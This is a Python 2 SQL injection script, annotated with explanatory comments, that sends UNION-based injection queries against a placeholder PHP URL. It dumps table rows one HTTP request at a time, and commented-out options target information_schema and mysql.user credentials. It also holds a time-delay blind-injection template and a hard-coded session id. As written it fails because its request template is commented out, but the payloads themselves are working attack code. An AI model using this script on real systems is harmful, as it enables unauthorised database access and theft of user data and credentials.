# Target configuration. sqli_inject() opens a connection to target_url:target_port
# and get_sqli_table() appends the injection string to target_path; `target`
# itself is assembled here but not referenced anywhere else in this file.
target_protocol="http"
target_url="www.some_url.pt"
target_path="/some/path.php?cmd=whatever&id=-5"
target=target_protocol+"://"+target_url+target_path
target_port=80
target_method="GET"
# When True, sqli_inject() writes each request line to logfile before sending it.
DEBUG_MODE=False
# Seconds interpolated into the delay-based template returned by get_column_names().
DELAY=1
# Not referenced anywhere in this file.
OPTIMUS_PRIME=False
# Opened at import time and closed only by the last line of the script (no
# with-block), so an exception mid-run leaves flushing to interpreter shutdown.
logfile = open('sqli.log', 'w+')
# Both request templates are commented out, so BASE_REQ is never bound and the
# get_sqli_table(BASE_REQ, ...) call at the bottom of the file raises NameError
# as written. Note that these templates also embed a session identifier (sid=)
# in the query string.
#BASE_REQ1=" UNION ALL select 1,${fieldname},3 from ${tablename} ${limit}&sid=81lk0elppnkagkfju95mgnmmf5&chave=&lang=pt"
#BASE_REQ=" UNION ALL select 1,${fieldname},3 from ${tablename} ${limit}&sid=81lk0elppnkagkfju95mgnmmf5&chave=&lang=pt"
def get_column_names(table_name):
    """Return a delay-based SQL template for probing one column name of *table_name*.

    Only ${tablename} is substituted here (by plain string concatenation, so
    table_name is inserted unquoted); the ${denial}, ${char} and ${ascii}
    placeholders are left for a caller to fill in.  DELAY is read at call time.
    This helper is not called anywhere in this file.
    """
    return "IF(ASCII(lower(substring((SELECT TOP 1 column_name FROM information_schema.columns WHERE table_name = \'"+table_name+"\'${denial}),${char},1)))=${ascii})waitfor delay '0:0:"+str(DELAY)+"';--"
import httplib
import time,sys
import urllib,urlparse
import re
# Wall-clock start; used only for the "Total time taken" print at the end of the script.
main_start=time.time()
def url_fix(s, charset='utf-8'):
    """Percent-encode the path and query of URL string *s* and return it reassembled.

    Python 2 only (`unicode`, `urlparse`, `urllib.quote`).  A unicode input is
    first encoded with *charset*, dropping unencodable characters.  The path
    keeps '/' and '%' unescaped; the query keeps ':', '&' and '=' and, because
    quote_plus is used, spaces become '+'.  In this file the argument is a
    path+query only (no scheme or host), so scheme and netloc come back empty.
    """
    if isinstance(s, unicode):
        s = s.encode(charset, 'ignore')
    scheme, netloc, path, qs, anchor = urlparse.urlsplit(s)
    path = urllib.quote(path, '/%')
    qs = urllib.quote_plus(qs, ':&=')
    return urlparse.urlunsplit((scheme, netloc, path, qs, anchor))
def sqli_inject(http_try):
    """Send *http_try* (path + query) to target_url:target_port and return up to 8000 response bytes.

    A fresh HTTPConnection is opened for every call and is never closed
    explicitly (no close() call; cleanup is left to garbage collection).  With
    DEBUG_MODE set, the exact request line is appended to logfile first.  The
    request method comes from target_method and the URL is passed through
    url_fix() before sending.  Each probe is therefore a separate request whose
    payload is visible in the query string of the server's access log.
    """
    httpServ = httplib.HTTPConnection(target_url, target_port)
    httpServ.connect()
    if DEBUG_MODE: logfile.write(http_try+'\n')
    httpServ.request(target_method, url_fix(http_try))
    response = httpServ.getresponse()
    # Only the first 8000 bytes are read; anything past that is discarded.
    return response.read(8000)
def handle_result(response): #[2250:2500]
    """Extract the text inside the first <span class="cor"> found in response[2250:2500].

    The slice bounds are hard-coded to where the value is expected to appear in
    the page body, so any change in page layout makes the split fail.  Any
    failure (IndexError from the split, or anything else -- the bare except also
    swallows KeyboardInterrupt and SystemExit on Python 2) is reported as the
    sentinel string '---', which get_sqli_table() treats as "no more rows".
    """
    result = ''
    try:
        result = response[2250:2500].split('<span class=\"cor\">')[1].rsplit('</span>')[0]
    except:
        result = '---'
    return result
# print response
# p = re.compile(r'<span class=\"cor\">(.*?)</span>', re.I | re.S | re.M)
# res = p.match(response)
# print res.groups()
# return res.group(1)
def get_sqli_table(sqli, fieldname, tablename, limit_begin=0, limit_end=2):
    """Fill the *sqli* template for one row at a time and print each extracted value.

    ${fieldname} and ${tablename} are substituted once; ${limit} is replaced
    per iteration with 'LIMIT index,index+1' for index in limit_begin..limit_end
    inclusive.  Each filled request goes through sqli_inject() and
    handle_result(); the loop stops at the first '---' sentinel.  Returns the
    last handle_result() value (so '---' when the loop ended on the sentinel).

    NOTE(review): indentation was lost in the rendering this was taken from;
    the nesting of the `if index == limit_end` check and the final return is
    reconstructed here and should be confirmed against the original file.
    """
    http_try = target_path + sqli.replace('${fieldname}',fieldname).replace('${tablename}',tablename)
    # current_line is assigned but never used; result's initial list value is
    # overwritten on the first iteration.
    result,current_line=[''],''
    for index in range(limit_begin, limit_end+1):
        http_try_index=http_try.replace('${limit}','LIMIT %d,%d' % (index,index+1))
        # print http_try_index
        result = handle_result(sqli_inject(http_try_index))
        if result == '---':
            break
        else:
            # Falls back to printing the request itself when the extracted value is empty.
            print result or http_try_index
        if index == limit_end:
            print 'reached LIMIT_END setting, there could be more contents and you don\'t know :('
    return result
# print '?',
#get_sqli_content(TABLE_CONTENT6,'name')
# Script entry: the column expression and table to list.  The commented
# alternatives below show the other (field, table) pairs the author tried;
# only the active pair is used.
field_name,table_name='id','tab_users'
#field_name,table_name='concat(table_schema,0x3a,table_name,0x3a,table_rows)','information_schema.tables'
#field_name,table_name='concat(table_schema,0x3a,table_name,0x3a,table_type,0x3a,table_rows)','information_schema.tables'
#field_name,table_name='concat(column_name,0x3a,data_type)','information_schema.columns WHERE table_name = \'tab_users\''
#field_name,table_name='concat(id,0x3a,data,0x3a,accao)','tab_logs_cron'
#field_name,table_name='concat(host,0x3a,user,0x3a,password)','mysql.user'
#field_name,table_name='column_name','information_schema.columns WHERE table_name =\'table_privileges\''
print ""
print "Listing %s(%s):" % (field_name,table_name)
print "============================================================================"
# BASE_REQ is only defined in a commented-out line near the top of the file, so
# this call raises NameError as the file stands.  Rows 0..200 are requested,
# one HTTP request per row, until handle_result() returns its '---' sentinel.
get_sqli_table(BASE_REQ,field_name,table_name,0,200)
print ""
print "Total time taken: "+str(time.time() - main_start)
# Only reached on a clean run; an exception above leaves logfile open.
logfile.close()